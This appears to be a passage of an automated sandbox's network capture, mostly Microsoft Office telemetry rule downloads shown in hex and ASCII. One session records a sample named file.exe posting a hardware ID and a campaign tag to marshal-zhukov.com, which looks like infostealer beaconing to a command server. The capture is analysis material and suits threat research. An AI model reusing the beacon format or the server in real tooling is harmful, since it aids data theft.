                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              47192.168.2.104975713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                              x-ms-request-id: f869b653-801e-008c-3284-407130000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153141Z-174f7845968cpnpfhC1EWR3afc0000000wt0000000009gqf
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              48192.168.2.104975813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 425
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                              x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153141Z-174f7845968kvnqxhC1EWRmf3g0000000fwg00000000g314
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              49192.168.2.104975913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:41 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                              x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153147Z-174f7845968frfdmhC1EWRxxbw0000000x5g00000000c1sb
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              50192.168.2.104976013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:42 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 448
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                              x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153142Z-174f78459688l8rvhC1EWRtzr000000009u0000000001z6x
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              51192.168.2.104976113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 491
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                              x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153143Z-174f784596886s2bhC1EWR743w0000000x80000000003713
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              52192.168.2.104976213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                              x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153143Z-174f7845968xr5c2hC1EWRd0hn0000000dxg00000000gnk6
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              53192.168.2.104976313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                              x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153143Z-174f7845968jrjrxhC1EWRmmrs0000000xb0000000003kd7
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:44 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              54192.168.2.1049764172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2YZBRIZ28
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1214
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:43 UTC1214OUTData Raw: 2d 2d 32 59 5a 42 52 49 5a 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 30 43 30 37 45 30 34 38 36 37 35 41 44 44 34 45 33 33 45 43 42 36 31 41 39 30 37 39 35 43 0d 0a 2d 2d 32 59 5a 42 52 49 5a 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 59 5a 42 52 49 5a 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 69 63 0d 0a 2d 2d 32 59 5a 42 52 49 5a 32 38 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                              Data Ascii: --2YZBRIZ28Content-Disposition: form-data; name="hwid"700C07E048675ADD4E33ECB61A90795C--2YZBRIZ28Content-Disposition: form-data; name="pid"1--2YZBRIZ28Content-Disposition: form-data; name="lid"LOGS11--LiveTrafic--2YZBRIZ28Content
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8qafbvsohb746ud92gc5gl5s09; expires=Sun, 23-Mar-2025 09:18:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEQCUH3OxFEj2jlfYWIFez9CqVAihDsU0jnX2gTI2uX501PED43eiYzSq3ivnHQYWRh6QvQER7PiIFuNBxeTj5AxgBcbo2FqWv0oKguTmQfO4QYp%2BcDKc5WrfIsdMQSmb%2BbVnM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932ab87dee5e7c-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1658&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2124&delivery_rate=1761158&cwnd=183&unsent_bytes=0&cid=569efdcacc81f336&ts=1893&x=0"
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              55192.168.2.104976513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:44 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
